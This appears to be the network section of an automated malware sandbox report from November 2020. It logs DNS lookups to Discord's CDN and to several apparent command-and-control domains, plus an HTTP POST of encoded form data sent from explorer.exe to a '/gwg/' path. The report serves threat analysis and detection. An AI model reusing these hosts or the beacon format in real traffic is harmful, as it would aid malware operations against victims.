Nov 28, 2020 10:26:02.053478956 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.053514957 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.053563118 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:39.791941881 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:39.823029995 CET	80	49763	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:39.823184013 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:39.823323011 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:39.854252100 CET	80	49763	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:39.854322910 CET	80	49763	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:39.854417086 CET	80	49763	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:39.854505062 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:39.854573965 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:39.854598045 CET	80	49763	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:39.856848955 CET	49763	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.857208967 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.887427092 CET	80	49766	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.887574911 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.887763023 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.887815952 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.888871908 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.918025017 CET	80	49766	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.918081999 CET	80	49766	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.918119907 CET	80	49766	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.918240070 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.918287992 CET	49766	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.918680906 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.918793917 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.920929909 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.951572895 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951608896 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951628923 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951647997 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951683044 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951703072 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951718092 CET	80	49767	213.171.195.105	192.168.2.6
Nov 28, 2020 10:26:41.951766968 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.951814890 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.951819897 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.951874018 CET	49767	80	192.168.2.6	213.171.195.105
Nov 28, 2020 10:26:41.951879978 CET	49767	80	192.168.2.6	213.171.195.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2020 10:24:47.571472883 CET	58336	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:47.606808901 CET	53	58336	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:48.299818993 CET	53781	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:48.326970100 CET	53	53781	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:49.022134066 CET	54064	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:49.049207926 CET	53	54064	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:50.337083101 CET	52811	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:50.364041090 CET	53	52811	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:51.347333908 CET	55299	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:51.382735014 CET	53	55299	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:52.086844921 CET	63745	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:52.122407913 CET	53	63745	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:52.982892990 CET	50055	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:53.013089895 CET	53	50055	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:53.982929945 CET	61374	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:54.010010004 CET	53	61374	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:54.406017065 CET	50339	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:54.441267967 CET	53	50339	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:54.535904884 CET	63307	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:54.562923908 CET	53	63307	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:54.810201883 CET	49694	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:54.837176085 CET	53	49694	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:55.803837061 CET	54982	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:55.830794096 CET	53	54982	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:56.836750984 CET	50010	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:56.863877058 CET	53	50010	8.8.8.8	192.168.2.6
Nov 28, 2020 10:24:57.501532078 CET	63718	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:24:57.528592110 CET	53	63718	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:10.794564009 CET	62116	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:10.821635008 CET	53	62116	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:10.955673933 CET	63816	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:10.982672930 CET	53	63816	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:15.862874031 CET	55014	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:15.889790058 CET	53	55014	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:18.774955034 CET	62208	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:18.802073002 CET	53	62208	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:18.957287073 CET	57574	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:18.984466076 CET	53	57574	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:38.104182005 CET	51818	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:38.139846087 CET	53	51818	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:45.153073072 CET	56628	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:45.188729048 CET	53	56628	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:46.443759918 CET	60778	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:46.470899105 CET	53	60778	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:47.029864073 CET	53799	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:47.065612078 CET	53	53799	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:47.662664890 CET	54683	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:47.689826965 CET	53	54683	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:48.161845922 CET	59329	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:48.189179897 CET	53	59329	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:48.660325050 CET	64021	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:48.687439919 CET	53	64021	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:49.221498966 CET	56129	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:49.250174999 CET	53	56129	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:50.018677950 CET	58177	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:50.054193974 CET	53	58177	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:50.570014954 CET	50700	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:50.607472897 CET	53	50700	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:50.928342104 CET	54069	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:50.978688955 CET	53	54069	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:51.409415007 CET	61178	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:51.444974899 CET	53	61178	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:52.477996111 CET	57017	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:52.513494968 CET	53	57017	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:53.222729921 CET	56327	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:53.249840975 CET	53	56327	8.8.8.8	192.168.2.6
Nov 28, 2020 10:25:58.287735939 CET	50243	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:25:58.379264116 CET	53	50243	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:00.452740908 CET	62055	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:00.693836927 CET	53	62055	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:14.526714087 CET	61249	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:14.577194929 CET	53	61249	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:18.844361067 CET	65252	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:18.881724119 CET	53	65252	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:19.334762096 CET	64367	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:19.374978065 CET	53	64367	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:21.526612043 CET	55066	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:21.562539101 CET	53	55066	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:21.568785906 CET	60211	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:21.595964909 CET	53	60211	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:39.743902922 CET	56570	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:39.790766954 CET	53	56570	8.8.8.8	192.168.2.6
Nov 28, 2020 10:26:41.394082069 CET	58454	53	192.168.2.6	8.8.8.8
Nov 28, 2020 10:26:41.421361923 CET	53	58454	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 28, 2020 10:24:54.406017065 CET	192.168.2.6	8.8.8.8	0x706b	Standard query (0)	discord.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.535904884 CET	192.168.2.6	8.8.8.8	0xc8d5	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.794564009 CET	192.168.2.6	8.8.8.8	0x8ea1	Standard query (0)	discord.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.955673933 CET	192.168.2.6	8.8.8.8	0x4f9c	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.774955034 CET	192.168.2.6	8.8.8.8	0x8001	Standard query (0)	discord.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.957287073 CET	192.168.2.6	8.8.8.8	0xa1bf	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:50.928342104 CET	192.168.2.6	8.8.8.8	0xd53e	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:58.287735939 CET	192.168.2.6	8.8.8.8	0xd36e	Standard query (0)	www.horne-construction.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:00.452740908 CET	192.168.2.6	8.8.8.8	0x9ca2	Standard query (0)	www.horne-construction.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:19.334762096 CET	192.168.2.6	8.8.8.8	0x2f08	Standard query (0)	www.milavins.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:21.526612043 CET	192.168.2.6	8.8.8.8	0x68c9	Standard query (0)	www.milavins.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:21.568785906 CET	192.168.2.6	8.8.8.8	0x2a72	Standard query (0)	www.milavins.com	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:39.743902922 CET	192.168.2.6	8.8.8.8	0x113f	Standard query (0)	www.systemmigrationservices.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 28, 2020 10:24:54.441267967 CET	8.8.8.8	192.168.2.6	0x706b	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.441267967 CET	8.8.8.8	192.168.2.6	0x706b	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.441267967 CET	8.8.8.8	192.168.2.6	0x706b	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.441267967 CET	8.8.8.8	192.168.2.6	0x706b	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.441267967 CET	8.8.8.8	192.168.2.6	0x706b	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.562923908 CET	8.8.8.8	192.168.2.6	0xc8d5	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.562923908 CET	8.8.8.8	192.168.2.6	0xc8d5	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.562923908 CET	8.8.8.8	192.168.2.6	0xc8d5	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.562923908 CET	8.8.8.8	192.168.2.6	0xc8d5	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:24:54.562923908 CET	8.8.8.8	192.168.2.6	0xc8d5	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.821635008 CET	8.8.8.8	192.168.2.6	0x8ea1	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.821635008 CET	8.8.8.8	192.168.2.6	0x8ea1	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.821635008 CET	8.8.8.8	192.168.2.6	0x8ea1	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.821635008 CET	8.8.8.8	192.168.2.6	0x8ea1	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.821635008 CET	8.8.8.8	192.168.2.6	0x8ea1	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.982672930 CET	8.8.8.8	192.168.2.6	0x4f9c	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.982672930 CET	8.8.8.8	192.168.2.6	0x4f9c	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.982672930 CET	8.8.8.8	192.168.2.6	0x4f9c	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.982672930 CET	8.8.8.8	192.168.2.6	0x4f9c	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:10.982672930 CET	8.8.8.8	192.168.2.6	0x4f9c	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.802073002 CET	8.8.8.8	192.168.2.6	0x8001	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.802073002 CET	8.8.8.8	192.168.2.6	0x8001	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.802073002 CET	8.8.8.8	192.168.2.6	0x8001	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.802073002 CET	8.8.8.8	192.168.2.6	0x8001	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.802073002 CET	8.8.8.8	192.168.2.6	0x8001	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.984466076 CET	8.8.8.8	192.168.2.6	0xa1bf	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.984466076 CET	8.8.8.8	192.168.2.6	0xa1bf	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.984466076 CET	8.8.8.8	192.168.2.6	0xa1bf	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.984466076 CET	8.8.8.8	192.168.2.6	0xa1bf	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:18.984466076 CET	8.8.8.8	192.168.2.6	0xa1bf	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 28, 2020 10:25:50.978688955 CET	8.8.8.8	192.168.2.6	0xd53e	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Nov 28, 2020 10:25:58.379264116 CET	8.8.8.8	192.168.2.6	0xd36e	Server failure (2)	www.horne-construction.com	none	none	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:00.693836927 CET	8.8.8.8	192.168.2.6	0x9ca2	No error (0)	www.horne-construction.com	horne-construction.com		CNAME (Canonical name)	IN (0x0001)
Nov 28, 2020 10:26:00.693836927 CET	8.8.8.8	192.168.2.6	0x9ca2	No error (0)	horne-construction.com		198.20.71.158	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:19.374978065 CET	8.8.8.8	192.168.2.6	0x2f08	Name error (3)	www.milavins.com	none	none	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:21.562539101 CET	8.8.8.8	192.168.2.6	0x68c9	Name error (3)	www.milavins.com	none	none	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:21.595964909 CET	8.8.8.8	192.168.2.6	0x2a72	Name error (3)	www.milavins.com	none	none	A (IP address)	IN (0x0001)
Nov 28, 2020 10:26:39.790766954 CET	8.8.8.8	192.168.2.6	0x113f	No error (0)	www.systemmigrationservices.com		213.171.195.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.horne-construction.com

www.systemmigrationservices.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49757	198.20.71.158	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2020 10:26:00.861838102 CET	7759	OUT	POST /gwg/ HTTP/1.1 Host: www.horne-construction.com Connection: close Content-Length: 413 Cache-Control: no-cache Origin: http://www.horne-construction.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.horne-construction.com/gwg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 70 50 55 3d 68 72 67 59 4d 66 52 41 31 76 28 4b 4e 52 38 4b 52 42 4b 44 33 54 79 6e 39 71 58 72 76 56 7e 53 43 6f 42 2d 55 4c 46 75 6b 4a 38 54 52 68 35 5f 56 34 58 52 35 6f 4a 6c 45 35 39 64 52 67 77 66 45 49 7a 36 74 66 4c 74 4d 41 41 51 7a 68 58 4e 48 78 36 4b 34 45 64 44 64 32 4e 74 73 5f 46 45 55 46 44 34 68 4a 55 7a 5a 6b 70 74 4b 58 74 4b 71 73 68 51 53 64 77 61 77 66 36 6f 6f 78 30 34 6c 67 31 78 53 34 35 76 79 35 61 4c 68 38 51 52 44 41 45 33 42 41 43 45 49 4f 62 36 37 69 33 46 4a 59 6d 44 41 2d 46 61 6b 4f 30 7a 73 44 66 46 30 6a 49 46 41 42 6a 52 69 43 39 79 45 43 47 6b 45 45 36 4b 42 63 6b 48 52 4e 44 6b 79 71 34 5a 6d 77 66 45 79 4f 71 63 77 6d 6d 64 43 4a 33 50 76 48 62 5a 63 64 68 38 6e 61 76 7a 78 6e 6c 43 6b 6b 6b 55 65 72 68 6e 6d 77 56 69 67 6e 4b 39 66 37 37 2d 58 42 57 43 7a 68 28 7a 46 62 78 77 43 6b 6c 31 67 54 78 45 6a 4c 6b 6b 61 74 43 61 75 38 57 46 33 46 35 4f 62 62 49 6e 71 37 30 70 28 36 52 4e 62 79 58 30 65 72 64 44 6b 67 54 72 58 47 33 6a 37 74 77 5a 73 48 74 6f 79 36 6c 6f 67 6e 7a 4e 39 32 62 32 4f 55 54 49 39 67 74 44 6a 46 77 76 4c 76 54 43 59 56 4d 66 50 51 32 66 78 6d 70 57 35 6c 61 4f 57 52 33 56 66 6a 49 7a 36 4d 53 38 77 6d 39 78 64 37 6e 42 33 32 59 75 48 79 6d 51 74 37 55 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=hrgYMfRA1v(KNR8KRBKD3Tyn9qXrvV~SCoB-ULFukJ8TRh5_V4XR5oJlE59dRgwfEIz6tfLtMAAQzhXNHx6K4EdDd2Nts_FEUFD4hJUzZkptKXtKqshQSdwawf6oox04lg1xS45vy5aLh8QRDAE3BACEIOb67i3FJYmDA-FakO0zsDfF0jIFABjRiC9yECGkEE6KBckHRNDkyq4ZmwfEyOqcwmmdCJ3PvHbZcdh8navzxnlCkkkUerhnmwVignK9f77-XBWCzh(zFbxwCkl1gTxEjLkkatCau8WF3F5ObbInq70p(6RNbyX0erdDkgTrXG3j7twZsHtoy6lognzN92b2OUTI9gtDjFwvLvTCYVMfPQ2fxmpW5laOWR3VfjIz6MS8wm9xd7nB32YuHymQt7U.
Nov 28, 2020 10:26:01.155482054 CET	7774	IN	HTTP/1.1 404 Not Found Connection: close Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://horne-construction.com/wp-json/>; rel="https://api.w.org/" Transfer-Encoding: chunked Content-Encoding: gzip Vary: Accept-Encoding Date: Sat, 28 Nov 2020 09:25:59 GMT Server: LiteSpeed Data Raw: 66 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3b d9 72 db 38 b6 cf f1 57 c0 4c c5 96 a6 49 48 96 d7 c8 96 7b 32 ee 74 dd 5b d5 9d 4c 65 79 4a 5c 2a 88 3c a2 d0 01 01 36 00 6a 29 c7 ff 7e 0b e0 4e 51 8b dd c9 cb cd 8b 45 e0 ac c0 d9 c9 dc 1c 06 c2 d7 ab 18 d0 4c 47 ec f6 e0 c6 fc 41 8c f0 70 e4 00 f7 3e 7f 74 cc 1a 90 e0 f6 e0 c5 4d 04 9a 20 7f 46 a4 02 3d 72 3e 7f fa dd bb 72 8a 75 4e 22 18 39 73 0a 8b 58 48 ed 20 5f 70 0d 5c 8f 9c 05 0d f4 6c 14 c0 9c fa e0 d9 07 17 51 4e 35 25 cc 53 3e 61 30 3a b1 54 18 e5 df 90 04 36 72 62 29 a6 94 81 83 66 12 a6 23 67 a6 75 ac 86 bd 5e 18 c5 21 16 32 ec 2d a7 bc 77 62 90 0e 5e dc 68 aa 19 dc fe 97 84 80 b8 d0 68 2a 12 1e a0 a3 97 57 83 93 93 6b f4 3f ef 3f bc 7b 8b ee de bf fb f8 e9 c3 e7 bb 4f ff fb fe dd 4d 2f 45 38 b8 29 d8 1d 07 5c 79 b1 84 29 68 7f 76 9c f2 3c ee f5 66 42 72 f0 7c c1 95 96 89 af a9 e0 d8 17 d1 31 ea dd ee c6 9d 0a ae 15 0e 85 08 19 90 98 aa fd 31 15 5e 18 15 1b 6c 1c c2 34 48 4e 34 38 c8 5c d6 c8 21 71 cc a8 4f 8c 58 3d a9 d4 2f cb 88 39 c8 aa 36 72 d6 b5 46 47 92 fc 9d 88 6b f4 3b 40 50 3d d6 e1 26 3d 7b 53 80 a0 e7 d4 b5 fd 61 62 dc 89 28 02 ae d5 13 e4 f1 33 94 8a 60 2f 5e dc 28 5f d2 58 67 67 a2 61 a9 7b 7f 91 39 49 57 8d 51 bd 78 b1 a0 3c 10 0b 3c 5e c4 10 89 bf e8 47 d0 9a f2 50 a1 11 7a 70 26 44 c1 67 c9 9c 61 66 62 5f 7b 5f 7b d9 05 7c ed d1 88 84 a0 be f6 7c 21 e1 6b cf 22 7f ed 9d 0c 70 1f f7 bd 93 af bd cb c1 f2 72 f0 b5 e7 b8 0e 2c b5 33 74 70 cc 43 c7 75 d4 3c 7c 2e 45 35 0f 2d 3d 35 0f df a6 24 d5 dc 92 14 89 f4 c1 19 3e 38 be e0 3e d1 56 94 4c e6 a1 11 b9 dd 52 bf f6 16 b1 47 b9 cf 92 c0 a8 f1 97 b2 0b 16 d9 93 c0 80 28 c0 11 e5 f8 2f f5 eb 1c e4 e8 1c 9f e1 33 e7 f1 f1 da 1c 5a ef 5f 87 e8 d3 8c 2a 64 dc 10 51 85 48 a2 85 17 02 07 49 34 04 e8 5f 3d 03 75 38 4d b8 75 8c 0e b8 c4 d5 dd 87 39 91 48 ba dc 15 2e 75 e3 11 c1 be 04 a2 e1 2d 03 73 d9 1d c7 27 7c 4e 94 d3 75 d5 28 c6 21 e8 3b 13 21 96 fa e8 a8 fa d4 71 06 81 d3 bd ce 49 23 bf 03 39 69 32 fa a8 25 e5 21 9e 4a 11 dd cd 88 bc 13 01 5c 2b ec 33 20 f2 03 f8 ba d3 77 fb 6e 8c d3 18 13 e3 19 d0 70 a6 bb ae c2 53 ca d8 27 58 ea 0e c1 c6 71 56 1d 3d a3 ca 85 ae db 77 fb dd 6b 2b f6 28 c6 5a fc 46 34 f9 fc e1 8f 4e f7 5a 82 4e 24 47 cf 27 ae 53 e2 ae 1c 8d ea a4 1f 0b d5 58 07 ba 0f 74 da 39 54 df bf 1f 96 42 76 53 de 87 27 d7 6a 41 b5 3f eb 28 6c 8e e9 3f 44 01 a3 1c 46 8e 16 b1 63 94 12 26 ba 5e f4 fb e8 74 10 2f d1 1b 49 09 73 5c e8 3e f8 44 81 33 65 24 74 86 19 29 bf f3 e5 64 70 f9 fa ea d2 bd 38 ef 9f be 76 af 06 fd 73 f7 f5 d5 eb f3 f4 f9 de 5d db 3e ad 6e 77 8f 8e 3a 87 7e e7 cb f9 f9 e9 f9 85 7b 7e 71 35 b8 70 8b df 27 af ef dd da ce d5 a0 7f 5a db ee 1e 1d 55 b0 2f 4f 4f 07 ee f9 c5 c9 e0 ca 3d bf 38 1b 9c 96 bf 4f cc 4a be 7e 52 fe 3e ed 97 bf ab f0 67 97 25 67 4b 35 e5 5c 90 38 35 7a d6 e9 d7 17 06 27 0d 88 d3 7e 63 61 d0 a4 71 76 79 df ed 5e db 13 ce fc b0 3c 62 73 24 97 56 a9 Data Ascii: fad;r8WLIH{2t[LeyJ\<6j)~NQELGAp>tM F=r>ruN"9sXH _p\lQN5%S>a0:T6rb)f#gu^!2-wb^hhWk??{OM/E8)\y)hv<fBr\|11^l4HN48\!qOX=/96rFGk;@P=&={Sab(3`/^(_Xgga{9IWQx<<^GPzp&Dgafb_{_{\|\|!k"pr,3tpCu<\|.E5-=5$>8>VLRG(/3Z_*dQHI4_=u8Mu9H.u-s'\|Nu(!;!qI#9i2%!J\+3 wnpS'XqV=wk+(ZF4NZN$G'SXt9TBvS'jA?(l?DFc&^t/Is\>D3e$t)dp8vs]>nw:~{~q5p'ZU/OO=8OJ~R>g%gK5\85z'~caqvy^<bs$V
Nov 28, 2020 10:26:01.155525923 CET	7775	IN	Data Raw: b3 5c ff cb d3 b3 41 7a da 66 d3 e8 77 d1 3f 2f 17 d6 a1 fb 99 4a eb 3b 96 4e 7a b0 15 3a e9 c2 3a 74 ff be fb 98 db 51 69 71 81 b1 38 63 ee 7a dd 3b b3 a0 d9 bd d6 58 49 7f 04 ae c6 01 4c 41 8e 34 4e 53 4e 33 bc ba c4 38 71 e6 dd ea 3f ab 4f 24 Data Ascii: \Azfw?/J;Nz::tQiq8cz;XILA4NSN38q?O$\|G"8\p_w3>N)u5VIl*5z9QnvCg?b73]_~T/~:o<.JQRqSaG#CSTJg?aE(`5:<q5
